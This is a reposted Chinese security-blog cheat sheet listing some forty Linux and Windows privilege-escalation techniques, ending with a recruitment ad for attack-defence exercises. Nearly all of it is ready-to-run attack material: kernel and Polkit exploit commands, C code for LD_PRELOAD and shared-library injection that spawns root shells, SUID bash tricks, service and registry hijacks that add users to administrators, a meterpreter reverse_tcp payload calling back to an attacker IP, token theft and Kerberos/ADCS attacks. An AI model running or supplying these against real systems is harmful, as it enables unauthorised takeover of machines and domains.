40种权限提升方法
2023-5-12 22:8:43 Author: Z2O安全攻防(查看原文) 阅读量:27 收藏

Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1.  gcc -pthread c0w.c -o c0w; ./c0w; passwd; id
Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1.  CVE-2016-1531.sh;id
Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1.https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

2.poc.sh

Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1. ./traitor-amd64 --exploit kernel:CVE-2022-0847

2.Whoami;id

Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1../cve-2021-4034
2. Whoami;id
Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
msf > use exploit/windows/local/ms14\_058\_track\_popup\_menu

msf exploit(ms14\_058\_track\_popup\_menu) > set TARGET < target-id >

msf exploit(ms14\_058\_track\_popup\_menu) > exploit

Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1.

In command prompt type: powershell.exe -nop -ep bypass

2.

In Power Shell prompt type: Import-Module C:\\Users\\User\\Desktop\\Tools\\Tater\\Tater.ps1

3.

In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup

administrators user /add"

4.

To confirm that the attack was successful, in Power Shell prompt type:

net localgroup administrators

Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. execute -H -f sysret.exe -a "-pid \[pid\]”
Domain: Yes
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1.https://github.com/outflanknl/PrintNightmare
2.PrintNightmare 10.10.10.10 exp.dll
Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1.https://github.com/JohnHammond/msdt-follina
2.python3 follina.py -c "notepad"
Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1.https://github.com/riparino/Task\_Scheduler\_ALPC
Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1.
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal\_user

2.
.\\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1.
certipy req 'lab.local/cve$:CVEPassword1234\*\\@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA

2.
Rubeus.exe asktgt /user:"TARGET\_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE\_PASSWORD" /domain:"FQDN\_DOMAIN" /dc:"DOMAIN\_CONTROLLER" /show

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1.python ms14-068.py -u user-a-1\\@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Methods:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD\_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

2.
gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
3.
sudo LD\_RELOAD=tmp/ldreload.so apache2
4.
id

Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Methods:
1.

Mkdir /home/user/.config

2.

#include <stdio.h>
#include <stdlib.h>
static void inject() _attribute _((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

3.
gcc -shared -o /home/user/.config/libcalc.so -fPIC/home/user/.config/libcalc.c

4. /usr/local/bin/suid-so

5. id

Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.

RemoteDLLInjector64
Or
MemJect
Or
https://github.com/tomcarver16/BOF-DLL-Inject

2.
#define PROCESS\_NAME "csgo.exe"
Or
RemoteDLLInjector64.exe pid C:\\runforpriv.dll
Or
mandllinjection ./runforpriv.dll pid

Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.hollow svchost.exe pop.bin
Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1.sec-shinject PID /path/to/bin
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
Methods:
1.  echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >
    
    > systemupdate.sh;
    
2.  chmod +x systemupdate.sh
    
3.  Wait a while
    
4.  /tmp/bash -p
    
5.  id && whoami
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
Methods:
1.  echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >
    
    > /home/user/systemupdate.sh;
    
2.  touch /home/user/ --checkpoint=1;
    
3.  touch /home/user/ --checkpoint-action=exec=sh\\systemupdate.sh
    
4.  Wait a while
    
5.  /tmp/bash -p
    
6.  id && whoami
Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Methods:
1. su - www-data;

2. nginxed-root.sh /var/log/nginx/error.log;

3.
In root user
invoke-rc.d nginx rotate >/dev/null 2>&1

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Methods:
1.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >/tmp/service.c;

2.
gcc /tmp/services.c -o /tmp/service;

3.
export PATH=/tmp:$PATH;

4.
/usr/local/bin/sudi-env; id

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Methods:
1.
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p'
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
Windows_dll.c:
cmd.exe /k net localgroup administrators user /add

2.
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

3.
sc stop dllsvc & sc start dllsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
sc config daclsvc binpath= "net localgroup administrators user /add"

2.
sc start daclsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o
common.exe

2.
Place common.exe in ‘C:\\Program Files\\Unquoted Path Service’.

3.
sc start unquotedsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t

REG_EXPAND_SZ /d c:\temp\x.exe /f

2.
sc start regsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
copy /y c:\\Temp\\x.exe "c:\\Program Files\\File Permissions Service\\filepermservice.exe"

2.
sc start filepermsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
In Metasploit (msf > prompt) type: use multi/handler

In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

In Metasploit (msf > prompt) type: run

Open an additional command prompt and type:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o

program.exe

2.
Place program.exe in ‘C:\\Program Files\\Autorun Program’.

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
msfvenom -p windows/exec CMD='net localgroup
administrators user /add' -f msi-nouac -o setup.msi

2.
msiexec /quiet /qn /i C:\\Temp\\setup.msi
Or
SharpUp.exe AlwaysInstallElevated

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
.load C:\\dev\\PrivEditor\\x64\\Release\\PrivEditor.dll
2.
!rmpriv
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
Conjure-LSASS
Or
syscall_enable_priv 20
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.injectEtwBypass pid
Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
PrimaryTokenTheft.exe pid
Or
TokenPlaye.exe --impersonate --pid pid
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.start /realtime SomeCpuIntensiveApp.exe
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.Just only compile and run SeManageVolumeAbuse
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.WRITE_OWNER access to a resource, including files and folders.
2.Run for privilege escalation
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1\. Launch PowerShell/ISE with the SeRestore privilege present.

2\. Enable the privilege with Enable-SeRestorePrivilege).

3\. Rename utilman.exe to utilman.old

4\. Rename cmd.exe to utilman.exe

5\. Lock the console and press Win+U

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) type: set uripath x
In Metasploit (msf > prompt) type: run

2.
In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column
and select “Create Dump File” from the popup menu.

3.
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
Select the Copy the Base64 encoded string.
In command prompt type: echo -ne [Base64 String] | base64 -d

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
.load C:\\dev\\PrivEditor\\x64\\Release\\PrivEditor.dll

2.
TrustExec.exe -m exec -c "whoami /priv" -f

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1\. takeown.exe /f "%windir%\\system32"

2\. icalcs.exe "%windir%\\system32" /grant "%username%":F

3\. Rename cmd.exe to utilman.exe

4\. Lock the console and press Win+U

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
PSBits
Or
PrivFu
2.
psexec.exe -i -s -d cmd.exe
Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1.
.load C:\\dev\\PrivEditor\\x64\\Release\\PrivEditor.dll
Or
CredManBOF
2.TrustExec.exe -m exec -c "whoami /priv" -f

同时也将文章汇总成了markdown笔记,方便大家留存脱网环境或者项目中查阅使用,公众号回复"20230512",即可获取。

hvv招募

2023Hvv大招募,蓝队中高级位置还有很多!参加的师傅扫描下面二维码提交简历,也可以添加下面的微信私信回复"hvv",拉你入hvv项目群!


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247496074&idx=1&sn=e6bb476dbc6eec2889a48fdf202a1c2d&chksm=ceab1acaf9dc93dc349de5ef52af6cff5dbb35bdeedc6e8578e90d906257f187eec99eb6e0c1#rd
如有侵权请联系:admin#unsafe.sh